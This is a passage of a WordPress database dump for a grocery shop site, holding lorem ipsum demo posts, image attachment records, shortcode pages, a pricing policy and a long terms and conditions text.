aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"But I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born and I will give you a complete account of the system, and expound the actual teachings of the great explorer of the truth, the master-builder of human happiness. No one rejects, dislikes, or avoids pleasure itself, because it is pleasure, but because those who do not know how to pursue pleasure rationally encounter consequences that are extremely painful. Nor again is there anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a trivial example, which of us ever undertakes laborious physical exercise, except to obtain some advantage from it? But who has any right to find fault with a man who chooses to enjoy a pleasure that has no annoying consequences, or one who avoids a pain that produces no resultant pleasure?\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Section 1.10.33 of \"de Finibus Bonorum et Malorum\", written by Cicero in 45 BC</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>\"At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est, omnis dolor repellendus. Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat.\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"On the other hand, we denounce with righteous indignation and dislike men who are so beguiled and demoralized by the charms of pleasure of the moment, so blinded by desire, that they cannot foresee the pain and trouble that are bound to ensue; and equal blame belongs to those who fail in their duty through weakness of will, which is the same as saying through shrinking from toil and pain. These cases are perfectly simple and easy to distinguish. In a free hour, when our power of choice is untrammelled and when nothing prevents our being able to do what we like best, every pleasure is to be welcomed and every pain avoided. But in certain circumstances and owing to the claims of duty or the obligations of business it will frequently occur that pleasures have to be repudiated and annoyances accepted. The wise man therefore always holds in these matters to this principle of selection: he rejects pleasures to secure other greater pleasures, or else he endures pains to avoid worse pains.\"</p>\n<!-- /wp:paragraph -->','Products are Hygienically packed, safely delivered.','','publish','open','open','','products-are-hygienically-packed-safely-delivered','','','2020-06-04 06:00:41','2020-06-04 06:00:41','',0,'https://wpthemes.themehunk.com/openshop-grocery-store/?p=252',0,'post','',0),(256,1,'2020-06-04 06:03:55','2020-06-04 06:03:55','<!-- wp:heading {\"level\":3} -->\n<h3>The standard Lorem Ipsum passage, used since the 1500s</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>\"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Section 1.10.32 of \"de Finibus Bonorum et Malorum\", written by Cicero in 45 BC</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>\"Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>1914 translation by H. Rackham</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>\"But I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born and I will give you a complete account of the system, and expound the actual teachings of the great explorer of the truth, the master-builder of human happiness. No one rejects, dislikes, or avoids pleasure itself, because it is pleasure, but because those who do not know how to pursue pleasure rationally encounter consequences that are extremely painful. Nor again is there anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a trivial example, which of us ever undertakes laborious physical exercise, except to obtain some advantage from it? But who has any right to find fault with a man who chooses to enjoy a pleasure that has no annoying consequences, or one who avoids a pain that produces no resultant pleasure?\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>Section 1.10.33 of \"de Finibus Bonorum et Malorum\", written by Cicero in 45 BC</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>\"At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est, omnis dolor repellendus. Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat.\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>1914 translation by H. Rackham</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>\"On the other hand, we denounce with righteous indignation and dislike men who are so beguiled and demoralized by the charms of pleasure of the moment, so blinded by desire, that they cannot foresee the pain and trouble that are bound to ensue; and equal blame belongs to those who fail in their duty through weakness of will, which is the same as saying through shrinking from toil and pain. These cases are perfectly simple and easy to distinguish. In a free hour, when our power of choice is untrammelled and when nothing prevents our being able to do what we like best, every pleasure is to be welcomed and every pain avoided. But in certain circumstances and owing to the claims of duty or the obligations of business it will frequently occur that pleasures have to be repudiated and annoyances accepted. The wise man therefore always holds in these matters to this principle of selection: he rejects pleasures to secure other greater pleasures, or else he endures pains to avoid worse pains.\"</p>\n<!-- /wp:paragraph -->','Get More Offers in the Time of lockdown ( Covid-19 )','','publish','open','open','','get-more-offers-in-the-time-of-lockdown-covid-19','','','2020-06-04 06:03:55','2020-06-04 06:03:55','',0,'https://wpthemes.themehunk.com/openshop-grocery-store/?p=256',0,'post','',0),(346,1,'2020-06-04 11:12:32','2020-06-04 11:12:32','','post1','','inherit','open','closed','','post1','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',256,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/post1.jpg',0,'attachment','image/jpeg',0),(348,1,'2020-06-04 11:21:42','2020-06-04 11:21:42','','post22','','inherit','open','closed','','post22','','','2022-01-24 07:49:05','2022-01-24 07:49:05','',252,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/06/post22.jpg',0,'attachment','image/jpeg',0),(367,1,'2020-06-18 10:27:14','2020-06-18 10:27:14','','openshop-pro','','publish','closed','closed','','openshop-pro','','','2020-06-18 10:27:14','2020-06-18 10:27:14','',0,'https://wpthemes.themehunk.com/openshop-grocery-store/2020/06/18/openshop-pro/',0,'custom_css','',0),(403,1,'2020-07-03 08:54:53','2020-07-03 08:54:53','<!-- wp:woocommerce/product-category {\"categories\":[35,41],\"catOperator\":\"all\"} /-->','Home','','publish','closed','closed','','home','','','2022-03-07 16:49:59','2022-03-07 11:19:59','',0,'https://wpthemes.themehunk.com/grocery-lite/?page_id=403',0,'page','',0),(431,1,'2020-07-06 12:57:05','2020-07-06 12:57:05','','slider-n1 (1)','','inherit','open','closed','','slider-n1-1','','','2020-07-06 12:57:05','2020-07-06 12:57:05','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/07/slider-n1-1.jpg',0,'attachment','image/jpeg',0),(432,1,'2020-07-06 13:08:02','2020-07-06 13:08:02','','slider2n (1)','','inherit','open','closed','','slider2n-1','','','2020-07-06 13:08:02','2020-07-06 13:08:02','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/07/slider2n-1.jpg',0,'attachment','image/jpeg',0),(453,1,'2020-07-07 07:13:38','2020-07-07 07:13:38','','banner-ad','','inherit','open','closed','','banner-ad','','','2020-07-07 07:13:38','2020-07-07 07:13:38','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/07/banner-ad.png',0,'attachment','image/png',0),(456,1,'2020-07-07 07:20:24','2020-07-07 07:20:24','','logo','','inherit','open','closed','','logo','','','2020-07-07 07:20:24','2020-07-07 07:20:24','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/07/logo.png',0,'attachment','image/png',0),(459,1,'2020-07-07 07:28:41','2020-07-07 07:28:41','','payment','','inherit','open','closed','','payment','','','2020-07-07 07:28:41','2020-07-07 07:28:41','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/07/payment.png',0,'attachment','image/png',0),(474,1,'2020-07-17 06:28:39','2020-07-17 06:28:39','','woocommerce-placeholder','','inherit','open','closed','','woocommerce-placeholder-2-2','','','2020-07-17 06:28:39','2020-07-17 06:28:39','',0,'https://wpthemes.themehunk.com/grocery-lite/wp-content/uploads/sites/128/2020/07/woocommerce-placeholder.png',0,'attachment','image/png',0),(476,1,'2021-01-30 06:12:08','2021-01-30 06:12:08','<!-- wp:shortcode -->\n[woosw_list]\n<!-- /wp:shortcode -->','Wishlist','','publish','closed','closed','','wishlist','','','2022-01-24 09:07:01','2022-01-24 09:07:01','',0,'https://wpthemes.themehunk.com/grocery-lite/wishlist/',0,'page','',0),(480,1,'2020-07-03 08:39:13','2020-07-03 08:39:13','Welcome to <a href=\"http://wpthemes.themehunk.com/\">ThemeHunk WP Themes</a>. This is your first post. Edit or delete it, then start blogging!','Hello world!','','publish','open','open','','hello-world-2','','','2020-07-03 08:39:13','2020-07-03 08:39:13','',0,'https://wpthemes.themehunk.com/grocery-lite/?p=1',0,'post','',1),(486,1,'2022-01-24 07:49:08','2022-01-24 07:49:08','','banner-ad','','inherit','open','closed','','banner-ad-2','','','2022-01-24 07:49:08','2022-01-24 07:49:08','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/banner-ad.png',0,'attachment','image/png',0),(487,1,'2022-01-24 07:49:08','2022-01-24 07:49:08','','logo','','inherit','open','closed','','logo-2','','','2022-01-24 07:49:08','2022-01-24 07:49:08','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/logo.png',0,'attachment','image/png',0),(490,1,'2022-01-24 08:19:02','2022-01-24 08:19:02','','02','','inherit','open','closed','','02','','','2022-01-24 08:19:02','2022-01-24 08:19:02','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/02.png',0,'attachment','image/png',0),(491,1,'2022-01-24 08:19:04','2022-01-24 08:19:04','','03','','inherit','open','closed','','03','','','2022-01-24 08:19:04','2022-01-24 08:19:04','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/03.png',0,'attachment','image/png',0),(492,1,'2022-01-24 08:19:05','2022-01-24 08:19:05','','04','','inherit','open','closed','','04','','','2022-01-28 11:17:52','2022-01-28 11:17:52','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/04.png',0,'attachment','image/png',0),(493,1,'2022-01-24 08:19:07','2022-01-24 08:19:07','','05','','inherit','open','closed','','05','','','2022-01-24 08:19:07','2022-01-24 08:19:07','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/05.png',0,'attachment','image/png',0),(494,1,'2022-01-24 08:19:10','2022-01-24 08:19:10','','06','','inherit','open','closed','','06','','','2022-01-24 08:19:10','2022-01-24 08:19:10','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/06.png',0,'attachment','image/png',0),(495,1,'2022-01-24 08:19:12','2022-01-24 08:19:12','','07','','inherit','open','closed','','07','','','2022-01-24 08:19:12','2022-01-24 08:19:12','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/07.png',0,'attachment','image/png',0),(496,1,'2022-01-24 08:19:14','2022-01-24 08:19:14','','08','','inherit','open','closed','','08','','','2022-01-24 08:19:14','2022-01-24 08:19:14','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/08.png',0,'attachment','image/png',0),(497,1,'2022-01-24 08:19:16','2022-01-24 08:19:16','','09','','inherit','open','closed','','09','','','2022-01-24 08:19:16','2022-01-24 08:19:16','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/09.png',0,'attachment','image/png',0),(498,1,'2022-01-24 08:19:18','2022-01-24 08:19:18','','10','','inherit','open','closed','','10','','','2022-01-24 08:19:18','2022-01-24 08:19:18','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/10.png',0,'attachment','image/png',0),(499,1,'2022-01-24 08:19:20','2022-01-24 08:19:20','','11','','inherit','open','closed','','11','','','2022-01-24 08:19:20','2022-01-24 08:19:20','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/11.png',0,'attachment','image/png',0),(500,1,'2022-01-24 08:19:22','2022-01-24 08:19:22','','12','','inherit','open','closed','','12','','','2022-01-24 08:19:22','2022-01-24 08:19:22','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/12.png',0,'attachment','image/png',0),(501,1,'2022-01-24 08:19:24','2022-01-24 08:19:24','','13','','inherit','open','closed','','13','','','2022-01-24 08:19:24','2022-01-24 08:19:24','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/13.png',0,'attachment','image/png',0),(502,1,'2022-01-24 08:19:28','2022-01-24 08:19:28','','14','','inherit','open','closed','','14','','','2022-01-24 08:19:28','2022-01-24 08:19:28','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/14.png',0,'attachment','image/png',0),(503,1,'2022-01-24 08:19:31','2022-01-24 08:19:31','','15','','inherit','open','closed','','15','','','2022-01-24 08:19:31','2022-01-24 08:19:31','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/15.png',0,'attachment','image/png',0),(504,1,'2022-01-24 08:19:33','2022-01-24 08:19:33','','16','','inherit','open','closed','','16','','','2022-02-15 12:52:47','2022-02-15 07:22:47','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/16.png',0,'attachment','image/png',0),(505,1,'2022-01-24 08:20:06','2022-01-24 08:20:06','','1-02','','inherit','open','closed','','1-02','','','2022-01-24 08:20:06','2022-01-24 08:20:06','',0,'https://www.mangomitra.in/wp-content/uploads/2022/01/1-02.png',0,'attachment','image/png',0),(516,1,'2022-01-24 09:07:00','2022-01-24 09:07:00','<!-- wp:shortcode -->\n[woosw_list]\n<!-- /wp:shortcode -->','Wishlist','','inherit','closed','closed','','476-revision-v1','','','2022-01-24 09:07:00','2022-01-24 09:07:00','',476,'https://www.mangomitra.in/?p=516',0,'revision','',0),(521,1,'2022-01-24 09:17:05','2022-01-24 09:17:05','<!-- wp:shortcode -->\n[vendor_registration]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Vendor Registration','','publish','closed','closed','','vendor-registration-2','','','2022-01-24 09:22:45','2022-01-24 09:22:45','',0,'https://www.mangomitra.in/?page_id=521',0,'page','',0),(522,1,'2022-01-24 09:17:05','2022-01-24 09:17:05','<!-- wp:shortcode -->\n[vendor_registration]\n<!-- /wp:shortcode -->','Vendor Registration','','inherit','closed','closed','','521-revision-v1','','','2022-01-24 09:17:05','2022-01-24 09:17:05','',521,'https://www.mangomitra.in/?p=522',0,'revision','',0),(524,1,'2022-01-24 09:22:44','2022-01-24 09:22:44','<!-- wp:shortcode -->\n[vendor_registration]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Vendor Registration','','inherit','closed','closed','','521-revision-v1','','','2022-01-24 09:22:44','2022-01-24 09:22:44','',521,'https://www.mangomitra.in/?p=524',0,'revision','',0),(553,1,'2022-01-24 10:30:15','2022-01-24 10:30:15','<!-- wp:woocommerce/product-category {\"categories\":[35,41],\"catOperator\":\"all\"} /-->','Home','','inherit','closed','closed','','403-revision-v1','','','2022-01-24 10:30:15','2022-01-24 10:30:15','',403,'https://www.mangomitra.in/?p=553',0,'revision','',0),(562,1,'2022-01-24 10:36:42','2022-01-24 10:36:42','<!-- wp:paragraph -->\n<p>All the products listed on the Site will be sold at MRP unless otherwise specified. The prices mentioned at the time of ordering will be the prices charged on the date of the delivery. Although prices of most of the products do not fluctuate on a daily basis but some of the commodities and fresh food prices do change on a daily basis. In case the prices are higher or lower on the date of delivery not additional charges will be collected or refunded as the case may be at the time of the delivery of the order.</p>\n<!-- /wp:paragraph -->','Pricing Policy','','publish','closed','closed','','pricing-policy','','','2022-01-24 10:36:43','2022-01-24 10:36:43','',0,'https://www.mangomitra.in/?page_id=562',0,'page','',0),(563,1,'2022-01-24 10:36:42','2022-01-24 10:36:42','<!-- wp:paragraph -->\n<p>All the products listed on the Site will be sold at MRP unless otherwise specified. The prices mentioned at the time of ordering will be the prices charged on the date of the delivery. Although prices of most of the products do not fluctuate on a daily basis but some of the commodities and fresh food prices do change on a daily basis. In case the prices are higher or lower on the date of delivery not additional charges will be collected or refunded as the case may be at the time of the delivery of the order.</p>\n<!-- /wp:paragraph -->','Pricing Policy','','inherit','closed','closed','','562-revision-v1','','','2022-01-24 10:36:42','2022-01-24 10:36:42','',562,'https://www.mangomitra.in/?p=563',0,'revision','',0),(564,1,'2022-01-24 10:37:32','2022-01-24 10:37:32','<!-- wp:paragraph -->\n<p>Home Direct Retail Solutions Pvt Ltd (“HDRSPL”) is the licensed owner of the brand homedirect.in and the website homedirect.in (”The Site”). As a visitor to the Site/ Customer you are advised to please read the Terms &amp; Conditions carefully. By accessing the services provided by the Site you agree to the terms provided in this Terms &amp; Conditions document.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Personal Information:</strong>&nbsp;As part of the registration process on the Site, HDRSPL may collect the following personally identifiable information about you: Name including first and last name, alternate email address, mobile phone number and contact details, Postal code, Demographic profile (like your age, gender, occupation, education, address etc.) and information about the pages on the site you visit/access, the links you click on the site, the number of times you access the page and any such browsing information.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Eligibility:</strong>&nbsp;Services of the Site would be available to only select geographies in India. Persons who are “incompetent to contract” within the meaning of the Indian Contract Act, 1872 including un-discharged insolvents etc. are not eligible to use the Site. If you are a minor i.e. under the age of 18 years but at least 13 years of age you may use the Site only under the supervision of a parent or legal guardian who agrees to be bound by these Terms of Use. If your age is below 18 years your parents or legal guardians can transact on behalf of you if they are registered users. You are prohibited from purchasing any material which is for adult consumption and the sale of which to minors is prohibited</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>License &amp; Site access:</strong>&nbsp;HDRSPL grants you a limited sub-license to access and make personal use of this site and not to download (other than page caching) or modify it, or any portion of it, except with express written consent of HDRSPL. This license does not include any resale or commercial use of this site or its contents; any collection and use of any product listings, descriptions, or prices; any derivative use of this site or its contents; any downloading or copying of account information for the benefit of another merchant; or any use of data mining, robots, or similar data gathering and extraction tools. This site or any portion of this site may not be reproduced, duplicated, copied, sold, resold, visited, or otherwise exploited for any commercial purpose without express written consent of HDRSPL. You may not frame or utilize framing techniques to enclose any trademark, logo, or other proprietary information (including images, text, page layout, or form) of the Site or of HDRSPL and its affiliates without express written consent. You may not use any meta tags or any other “hidden text” utilizing the Site’s or HDRSPL’s name or trademarks without the express written consent of HDRSPL. Any unauthorized use terminates the permission or license granted by HDRSPL.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Account &amp; Registration Obligations:</strong>&nbsp;All shoppers have to register and login for placing orders on the Site. You have to keep your account and registration details current and correct for communications related to your purchases from the site. By agreeing to the terms and conditions, the shopper agrees to receive promotional communication and newsletters upon registration. The customer can opt out either by unsubscribing in “My Account” or by contacting the customer service.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Pricing:</strong>&nbsp;All the products listed on the Site will be sold at MRP unless otherwise specified. The prices mentioned at the time of ordering will be the prices charged on the date of the delivery. Although prices of most of the products do not fluctuate on a daily basis but some of the commodities and fresh food prices do change on a daily basis. In case the prices are higher or lower on the date of delivery not additional charges will be collected or refunded as the case may be at the time of the delivery of the order.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Cancellation by Site / Customer:</strong>&nbsp;You as a customer can cancel your order anytime up to the cut-off time of the slot for which you have placed an order by calling our customer service. In such a case we will refund any payments already made by you for the order. If we suspect any fraudulent transaction by any customer or any transaction which defies the terms &amp; conditions of using the website, we at our sole discretion could cancel such orders. We will maintain a negative list of all fraudulent transactions and customers and would deny access to them or cancel any orders placed by them.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>You Agree and Confirm</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>That in the event that a non-delivery occurs on account of a mistake by you (i.e. wrong name or address or any other wrong information) any extra cost incurred by HDRSPL for redelivery shall be claimed from you.</li><li>That you will use the services provided by the Site, its affiliates, consultants and contracted companies, for lawful purposes only and comply with all applicable laws and regulations while using and transacting on the Site.</li><li>You will provide authentic and true information in all instances where such information is requested of you. HDRSPL reserves the right to confirm and validate the information and other details provided by you at any point of time. If upon confirmation your details are found not to be true (wholly or partly), it has the right in its sole discretion to reject the registration and debar you from using the Services and / or other affiliated websites without prior intimation whatsoever.</li><li>You authorise HDRSPL to contact you for any transactional purposes related to your order/account.</li><li>That you are accessing the services available on this Site and transacting at your sole risk and are using your best and prudent judgment before entering into any transaction through this Site.</li><li>That the address at which delivery of the product ordered by you is to be made will be correct and proper in all respects.</li><li>That before placing an order you will check the product description carefully. By placing an order for a product you agree to be bound by the conditions of sale included in the item’s description.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3>You may not use the Site for any of the following purposes:</h3>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Disseminating any unlawful, harassing, libellous, abusive, threatening, harmful, vulgar, obscene, or otherwise objectionable material.</li><li>Transmitting material that encourages conduct that constitutes a criminal offence or results in civil liability or otherwise breaches any relevant laws, regulations or code of practice.</li><li>Gaining unauthorized access to other computer systems.</li><li>Interfering with any other person’s use or enjoyment of the Site.</li><li>Breaching any applicable laws;</li><li>Interfering or disrupting networks or web sites connected to the Site.&nbsp;</li><li>Making, transmitting or storing electronic copies of materials protected by copyright without the permission of the owner.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>Colours:</strong>&nbsp;We have made every effort to display the colours of our products that appear on the Website as accurately as possible. However, as the actual colours you see will depend on your monitor, we cannot guarantee that your monitor’s display of any colour will be accurate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Modification of Terms &amp; Conditions of Service:</strong>&nbsp;HDRSPL may at any time modify the Terms &amp; Conditions of Use of the Website without any prior notification to you. You can access the latest version of these Terms &amp; Conditions at any given time on the Site. You should regularly review the Terms &amp; Conditions on the Site. In the event the modified Terms &amp; Conditions is not acceptable to you, you should discontinue using the Service. However, if you continue to use the Service you shall be deemed to have agreed to accept and abide by the modified Terms &amp; Conditions of Use of this Site.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Governing Law and Jurisdiction:</strong>&nbsp;This User Agreement shall be construed in accordance with the applicable laws of India. The Courts at Bangalore shall have exclusive jurisdiction in any proceedings arising out of this agreement. Any dispute or difference either in interpretation or otherwise, of any terms of this User Agreement between the parties hereto, the same shall be referred to an independent arbitrator who will be appointed by HDRSPL and his decision shall be final and binding on the parties hereto. The above arbitration shall be in accordance with the Arbitration and Conciliation Act, 1996 as amended from time to time. The arbitration shall be held in Bangalore. The High Court of judicature at Bangalore alone shall have the jurisdiction and the Laws of India shall apply.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Reviews, Feedback, Submissions:</strong>&nbsp;All reviews, comments, feedback, postcards, suggestions, ideas, and other submissions disclosed, submitted or offered to the Site on or by this Site or otherwise disclosed, submitted or offered in connection with your use of this Site (collectively, the “Comments”) shall be and remain the property of HDRSPL. Such disclosure, submission or offer of any Comments shall constitute an assignment to HDRSPL of all worldwide rights, titles and interests in all copyrights and other intellectual properties in the Comments. Thus, HDRSPL owns exclusively all such rights, titles and interests and shall not be limited in any way in its use, commercial or otherwise, of any Comments. HDRSPL will be entitled to use, reproduce, disclose, modify, adapt, create derivative works from, publish, display and distribute any Comments you submit for any purpose whatsoever, without restriction and without compensating you in any way. HDRSPL is and shall be under no obligation (1) to maintain any Comments in confidence; (2) to pay you any compensation for any Comments; or (3) to respond to any Comments. You agree that any Comments submitted by you to the Site will not violate this policy or any right of any third party, including copyright, trademark, privacy or other personal or proprietary right(s), and will not cause injury to any person or entity. You further agree that no Comments submitted by you to the Website will be or contain libelous or otherwise unlawful, threatening, abusive or obscene material, or contain software viruses, political campaigning, commercial solicitation, chain letters, mass mailings or any form of “spam”. Please note all reviews submitted by customers are subject to checks and moderation by our content Team. HDRSPL reserves the rights to moderate as well as publish/not publish the reviews. HDRSPL reserves the rights to solicit or withhold reviews and ratings with no liability. HDRSPL reserve the right to accept, reject, moderate, monitor &amp; edit or remove any comment. You grant HDRSPL the right to use the name that you submit in connection with any Comments. You agree not to use a false email address, impersonate any person or entity, or otherwise mislead as to the origin of any Comments you submit. You are and shall remain solely responsible for the content of any Comments you make, and you agree to indemnify HDRSPL and its affiliates for all claims resulting from any Comments you submit. HDRSPL and its affiliates take no responsibility and assume no liability for any Comments submitted by you or any third party.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Copyright &amp; Trademark:</strong>&nbsp;HDRSPL, its suppliers and licensors expressly reserve all intellectual property rights in all text, programs, products, processes, technology, content and other materials, which appear on this Site. Access to this Website does not confer and shall not be considered as conferring upon anyone any license under any of HDRSPL or any third party’s intellectual property rights. All rights, including copyright, in this website are owned by or licensed to HDRSPL. Any use of this website or its contents, including copying or storing it or them in whole or part, other than for your own personal, non-commercial use is prohibited without the permission of HDRSPL. You may not modify, distribute or re-post anything on this website for any purpose. The names and logos and all related product and service names, design marks and slogans are the trademarks or service marks of HDRSPL, its affiliates, its partners or its suppliers. All other marks are the property of their respective companies. No trademark or service mark license is granted in connection with the materials contained on this Site. Access to this Site does not authorize anyone to use any name, logo or mark in any manner. References on this Site to any names, marks, products or services of third parties or hypertext links to third party sites or information are provided solely as a convenience to you and do not in any way constitute or imply HDRSPL endorsement, sponsorship or recommendation of the third party, information, product or service. HDRSPL is not responsible for the content of any third party sites and does not make any representations regarding the content or accuracy of material on such sites. If you decide to link to any such third party websites, you do so entirely at your own risk. All materials, including images, text, illustrations, designs, icons, photographs, programs, music clips or downloads, video clips and written and other materials that are part of this Website (collectively, the “Contents”) are intended solely for personal, non-commercial use. You may download or copy the Contents and other downloadable materials displayed on the Website for your personal use only. No right, title or interest in any downloaded materials or software is transferred to you as a result of any such downloading or copying. You may not reproduce (except as noted above), publish, transmit, distribute, display, modify, create derivative works from, sell or participate in any sale of or exploit in any way, in whole or in part, any of the Contents, the Website or any related software. All software used on this Website is the property of HDRSPL or its licensees and suppliers and protected by Indian and international copyright laws. The Contents and software on this Website may be used only as a shopping resource. Any other use, including the reproduction, modification, distribution, transmission, republication, display, or performance, of the Contents on this Website is strictly prohibited. Unless otherwise noted, all Contents are copyrights, trademarks, trade dress and/or other intellectual property owned, controlled or licensed by HDRSPL, one of its affiliates or by third parties who have licensed their materials to HDRSPL and are protected by Indian and international copyright laws. The compilation (meaning the collection, arrangement, and assembly) of all Contents on this Website is the exclusive property of HDRSPL and is also protected by Indian and international copyright laws.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>Objectionable Material:</strong>&nbsp;You understand that by using this Site or any services provided on the Site, you may encounter Content that may be deemed by some to be offensive, indecent, or objectionable, which Content may or may not be identified as such. You agree to use the Site and any service at your sole risk and that to the fullest extent permitted under applicable law, HDRSPL and its affiliates shall have no liability to you for Content that may be deemed offensive, indecent, or objectionable to 